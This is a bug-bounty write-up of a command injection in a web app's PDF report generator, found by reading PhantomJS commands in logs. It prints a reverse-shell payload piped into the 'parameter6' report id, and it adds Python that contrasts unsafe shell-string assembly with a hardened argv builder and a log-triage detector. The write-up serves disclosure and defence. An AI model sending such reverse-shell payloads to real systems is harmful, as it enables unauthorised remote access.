Private Program – Backtracking logs for Command Injection.

Hey guys, today I want to share a Command Injection finding from a private program. If you haven't read my earlier post on Code Execution, read it first, as it will make you familiar with the kind of web app I'm hunting on here.

What? Go read it first

So let's start. As I said in the earlier post, I was going through the logs of this web app, 2 GB across 10 files ¯\_(ツ)_/¯. One line caught my attention:


/opt/xx/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/xx/resources/tav_test.js 'https://localhost:8080/ki/?&type=tav&org_id=0&org_name=your+organization&report=abc&from=now-1d&to=now#/greport/iocmatches.rpt?from=now-1d&to=now' iocmatches.rpt /opt/xx/var/reports/3a71d03e9d584bd092968bc96dcb5f720_2017_07_02_10_58_00_002040.pdf

So the web app was executing PhantomJS against a URL. What caught my eye was that the org_name parameter had the value your+organization, which means the command may contain our input. So the first step was to find which section of the web app executed this command and see which inputs we control. Looking at the report under this URL, I found it was produced by a feature called generate report, which generates a PDF report. Now let's have a look at the parameters:

{"parameter":"report_iocmatches_weekly.rpt","parameter2":"test","parameter3":"* * * * *","parameter4":{"to":"now/d","from":"now/d","mode":"quick"},"enabled":true,"created_ts":"2017-09-17T16:47:48Z","parameter5":"blah.rpt","modified_ts":"2017-09-17T16:47:48Z","parameter6":"3a71d03e9d584bd092968bc96dcb5f720","parameter7":"test","$$hashKey":"032"}

No org_name 🙁 But wait, the "parameter6" value is reflected there (it is the report id at the start of the PDF file name in the output path, the last argument of the command), so let's try this. I passed:

"parameter6":"3a71d03e9d584bd092968bc96dcb5f720 | bash -i >& /dev/tcp/server/port 0>&1 |"

And boom!
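To make the bug concrete, here is an added example (my reconstruction, not the program's own code) of the two ways the report-generation command can be assembled. The binary, script and report paths come from the logged command; the id format, the timestamp suffix and the function names are assumptions. The first builder pastes parameter6 into one shell string, as the log suggests the app did, and the tokeniser shows that the payload above turns a single PhantomJS invocation into a three-stage pipeline whose second stage is bash. The second builder rejects anything that is not a report id and passes every value as its own argv element with no shell, which is the fix.

```python
from __future__ import annotations

import re
import shlex
import subprocess

# Paths copied from the command quoted in the log.
PHANTOMJS = "/opt/xx/local/phantomjs/bin/phantomjs"
RENDER_SCRIPT = "/opt/xx/resources/tav_test.js"
REPORT_DIR = "/opt/xx/var/reports"
# Stand-in for the timestamp the app appends to the file name (assumption).
TIMESTAMP = "2017_09_17_16_48_01"

# The id seen in the log is 33 lowercase hex characters; the exact length
# bound is an assumption, tighten it to whatever the app really issues.
REPORT_ID_RE = re.compile(r"[0-9a-f]{32,40}")

LEGIT_ID = "3a71d03e9d584bd092968bc96dcb5f720"
# The payload from the post, as sent in parameter6.
INJECTED_ID = "3a71d03e9d584bd092968bc96dcb5f720 | bash -i >& /dev/tcp/server/port 0>&1 |"


def report_url(template: str) -> str:
    """Simplified form of the report URL from the log (query trimmed)."""
    return f"https://localhost:8080/ki/?&type=tav&org_id=0&report=abc#/greport/{template}"


def build_command_unsafe(report_id: str, template: str = "iocmatches.rpt") -> str:
    """Reconstruction (assumption) of how the logged command was assembled:
    parameter6 is interpolated into one shell string with no validation and
    no quoting, so shell metacharacters in it become part of the command line."""
    out = f"{REPORT_DIR}/{report_id}_{TIMESTAMP}.pdf"
    return f"{PHANTOMJS} --ignore-ssl-errors=yes {RENDER_SCRIPT} '{report_url(template)}' {template} {out}"


def shell_pipeline(cmd: str) -> list[list[str]]:
    """Tokenise cmd the way a POSIX shell would and split it on '|', so we can
    see how many separate programs the string would launch. Nothing is executed."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    segments: list[list[str]] = [[]]
    for tok in lexer:
        if tok == "|":
            segments.append([])
        else:
            segments[-1].append(tok)
    return [seg for seg in segments if seg]


def build_argv_safe(report_id: str, template: str = "iocmatches.rpt") -> list[str]:
    """Hardened version: allow-list the id and template, then hand every value
    to the process as its own argv element. No shell ever parses user input."""
    if not REPORT_ID_RE.fullmatch(report_id):
        raise ValueError(f"invalid report id: {report_id!r}")
    if not re.fullmatch(r"[A-Za-z0-9_]+\.rpt", template):
        raise ValueError(f"invalid report template: {template!r}")
    out = f"{REPORT_DIR}/{report_id}_{TIMESTAMP}.pdf"
    return [PHANTOMJS, "--ignore-ssl-errors=yes", RENDER_SCRIPT, report_url(template), template, out]


def render_report(report_id: str) -> subprocess.CompletedProcess:
    """How the hardened code launches PhantomJS: argv list, shell=False (default)."""
    return subprocess.run(build_argv_safe(report_id), check=True, capture_output=True)


if __name__ == "__main__":
    for rid in (LEGIT_ID, INJECTED_ID):
        print(f"parameter6={rid!r}")
        for i, stage in enumerate(shell_pipeline(build_command_unsafe(rid)), 1):
            print(f"  stage {i}: {stage[0]} ...")
        try:
            print("  hardened argv:", build_argv_safe(rid)[-1])
        except ValueError as err:
            print("  hardened builder rejected it:", err)
```

The org_name value in the logged URL is user input too; in the hardened version it belongs in the URL via urllib.parse.urlencode and is covered by the same no-shell rule, since the URL is just one more argv element.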

Now, this was simple, but getting through those 2 GB of logs wasn't easy, especially as they were split across several files :'( I found this command in the 7th part.
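If you want to find this kind of thing in a log dump without reading 2 GB by hand, the following added script (mine, not from the post or the vendor) pulls every PhantomJS invocation out of a log, recovers the report id from the output path and flags ids that are not plain hex. The line prefix and the id length bound are assumptions, and the three sample lines are constructed: the first mirrors the line quoted above, the third is what the payload from the post would look like once the app had pasted it into the command.

```python
import re

# Constructed log excerpt (not real data). Timestamp and "exec:" prefix are assumed.
SAMPLE_LOG = """\
2017-07-02 10:58:00 INFO exec: /opt/xx/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/xx/resources/tav_test.js 'https://localhost:8080/ki/?&type=tav&org_id=0&org_name=your+organization&report=abc&from=now-1d&to=now#/greport/iocmatches.rpt?from=now-1d&to=now' iocmatches.rpt /opt/xx/var/reports/3a71d03e9d584bd092968bc96dcb5f720_2017_07_02_10_58_00_002040.pdf
2017-07-02 11:02:13 INFO scheduler: report job 42 finished
2017-09-17 16:48:01 INFO exec: /opt/xx/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/xx/resources/tav_test.js 'https://localhost:8080/ki/?&type=tav&org_id=0&org_name=test&report=abc&from=now%2Fd&to=now%2Fd#/greport/blah.rpt' blah.rpt /opt/xx/var/reports/3a71d03e9d584bd092968bc96dcb5f720 | bash -i >& /dev/tcp/server/port 0>&1 |_2017_09_17_16_48_01_000001.pdf
"""

PHANTOMJS = "/opt/xx/local/phantomjs/bin/phantomjs"
# Report ids in the log are lowercase hex (33 chars); the length bound is an assumption.
REPORT_ID_RE = re.compile(r"[0-9a-f]{32,40}")
# parameter6 is whatever sits between the reports directory and the timestamp suffix.
OUT_PATH_RE = re.compile(r"/opt/xx/var/reports/(?P<rid>.*?)_\d{4}_\d{2}_\d{2}_")
# Characters that let a value break out of, or chain onto, a shell command.
SHELL_META = re.compile(r"[;|&$`<>]")


def phantomjs_invocations(log_text):
    """Yield (line number, command string) for every line that runs PhantomJS."""
    for lineno, line in enumerate(log_text.splitlines(), 1):
        idx = line.find(PHANTOMJS)
        if idx != -1:
            yield lineno, line[idx:]


def report_id_of(cmd):
    """Recover the raw parameter6 value from the output path, or None."""
    m = OUT_PATH_RE.search(cmd)
    return m.group("rid") if m else None


def triage(log_text):
    """Classify each PhantomJS invocation by what its report id looks like:
    'ok' (plain hex), 'injection' (shell metacharacters present),
    'malformed' (neither) or 'unparsed' (output path not found)."""
    findings = []
    for lineno, cmd in phantomjs_invocations(log_text):
        rid = report_id_of(cmd)
        if rid is None:
            verdict = "unparsed"
        elif REPORT_ID_RE.fullmatch(rid):
            verdict = "ok"
        elif SHELL_META.search(rid):
            verdict = "injection"
        else:
            verdict = "malformed"
        findings.append({"line": lineno, "report_id": rid, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f['line']}: {f['verdict']:9} {f['report_id']!r}")
```

Run it with the real files as input (for example, feed each part of the split log through triage in turn) and grep the output for anything other than "ok"; the same idea applies to any other user-supplied value you can see landing inside an exec'd command line.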

I learned one more thing: always test parameters by fuzzing different things; you don't know what the developers are doing with your input ¯\_(ツ)_/¯. Now, if you are a good reader, you must have noticed that this request may be prone to many other issues, and one is quite awesome. I will write about those soon (some of you may have already guessed 😉). That's all for now. I will also soon write about backtracking their OAuth endpoints for account takeover 🙂

Thanks: Prince Chaddha

Thanks for reading!

Harsh from Bugdiscloseguys!
